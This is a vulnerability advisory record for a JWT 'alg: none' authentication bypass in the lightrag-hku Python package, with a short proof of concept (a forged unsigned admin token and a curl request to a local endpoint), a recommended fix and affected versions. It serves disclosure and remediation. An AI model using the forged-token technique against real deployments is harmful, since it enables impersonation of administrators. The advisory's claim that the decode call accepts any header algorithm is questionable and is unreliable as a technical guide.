GHSA-8ffj-4hx4-9pgf

Source

https://github.com/advisories/GHSA-8ffj-4hx4-9pgf

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-8ffj-4hx4-9pgf/GHSA-8ffj-4hx4-9pgf.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-8ffj-4hx4-9pgf

Aliases

CVE-2026-39413

Published

2026-04-08T00:17:50Z

Modified

2026-05-05T16:04:40.864938Z

Severity

4.2 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:N/A:N CVSS Calculator

Summary

lightrag-hku: JWT Algorithm Confusion Vulnerability

Details

Summary

The LightRAG API is vulnerable to a JWT algorithm confusion attack where an attacker can forge tokens by specifying 'alg': 'none' in the JWT header. Since the jwt.decode() call does not explicitly deny the 'none' algorithm, a crafted token without a signature will be accepted as valid, leading to unauthorized access.

Details

In lightrag/api/auth.py at line 128, the validate_token method calls:

payload = jwt.decode(token, self.secret, algorithms=[self.algorithm])

This allows any algorithm listed in the token's header to be processed, including 'none'. The code does not explicitly specify that 'none' is not allowed, making it possible for an attacker to bypass authentication.

PoC

An attacker can generate a JWT with the following structure:

{
  "header": {
    "alg": "none",
    "typ": "JWT"
  },
  "payload": {
    "sub": "admin",
    "exp": 1700000000,
    "role": "admin"
  }
}

Then send a request like:

curl -H "Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTcwMDAwMDAwMCwicm9sZSI6ImFkbWluIn0." http://localhost:8000/api/protected-endpoint

Impact

An attacker can impersonate any user, including administrators, by forging a JWT with 'alg': 'none', gaining full access to protected resources without needing valid credentials.

Recommended Fix

Explicitly specify allowed algorithms and exclude 'none'. Modify the validate_token method to:

allowed_algorithms = [self.algorithm] if self.algorithm != 'none' else ['HS256', 'HS384', 'HS512']
payload = jwt.decode(token, self.secret, algorithms=allowed_algorithms)

Or better yet, hardcode the expected algorithm(s):

payload = jwt.decode(token, self.secret, algorithms=['HS256'])

Database specific

{
    "github_reviewed_at": "2026-04-08T00:17:50Z",
    "github_reviewed": true,
    "cwe_ids": [
        "CWE-347"
    ],
    "nvd_published_at": "2026-04-08T20:16:25Z",
    "severity": "MODERATE"
}

References

Affected packages

PyPI / lightrag-hku

Package

Name: lightrag-hku; View open source insights on deps.dev
Purl: pkg:pypi/lightrag-hku

Affected ranges

Type: ECOSYSTEM
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

1.4.14

Affected versions

0.*

0.0.2

0.0.3

0.0.4

0.0.5

0.0.6

0.0.7

0.0.8

0.0.9

1.*

1.0.0

1.0.1

1.0.3

1.0.5

1.0.6

1.0.8

1.0.9

1.1.0

1.1.1

1.1.2

1.1.3

1.1.4

1.1.5

1.1.6

1.1.7

1.2.1

1.2.2

1.2.3

1.2.5

1.2.6

1.3.0

1.3.1

1.3.2

1.3.3

1.3.4

1.3.5

1.3.6

1.3.7

1.3.8

1.3.9

1.4.0

1.4.1

1.4.2

1.4.3

1.4.4

1.4.5

1.4.6

1.4.7

1.4.8rc4

1.4.8rc6

1.4.8rc7

1.4.8rc8

1.4.8rc9

1.4.8.1

1.4.8.2

1.4.9rc1

1.4.9rc2

1.4.9rc3

1.4.9rc4

1.4.9

1.4.9.1

1.4.9.2

1.4.9.3

1.4.9.4rc1

1.4.9.4

1.4.9.5

1.4.9.6

1.4.9.7

1.4.9.8

1.4.9.9

1.4.9.10

1.4.9.11

1.4.10

1.4.11rc2

1.4.11

1.4.12rc1

1.4.12

1.4.13rc1

1.4.13

Database specific

last_known_affected_version_range

"<= 1.4.13"

source

"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-8ffj-4hx4-9pgf/GHSA-8ffj-4hx4-9pgf.json"